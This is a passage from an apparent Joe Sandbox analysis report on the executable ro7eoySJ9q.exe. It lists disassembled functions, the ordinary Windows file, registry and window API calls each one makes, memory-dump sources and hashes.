                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                        • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                        • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                        • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                        Function 004059CF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                        • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                        • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                        • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                        Function 004059AA Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                        • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                        • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                        • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                        Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                        • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                        • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                        • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                        Function 00403160 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                        • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                        • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                        • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                        Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                        • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                        • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                        • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                        Function 00402293 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                        • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                        • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                        • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                        Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                        • Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
                                                        • Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                        • Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E
                                                        Function 00403FE1 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                        • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                        • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                        • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                        Function 00403FCA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                        • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                        • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                        • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                        Function 00403192 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
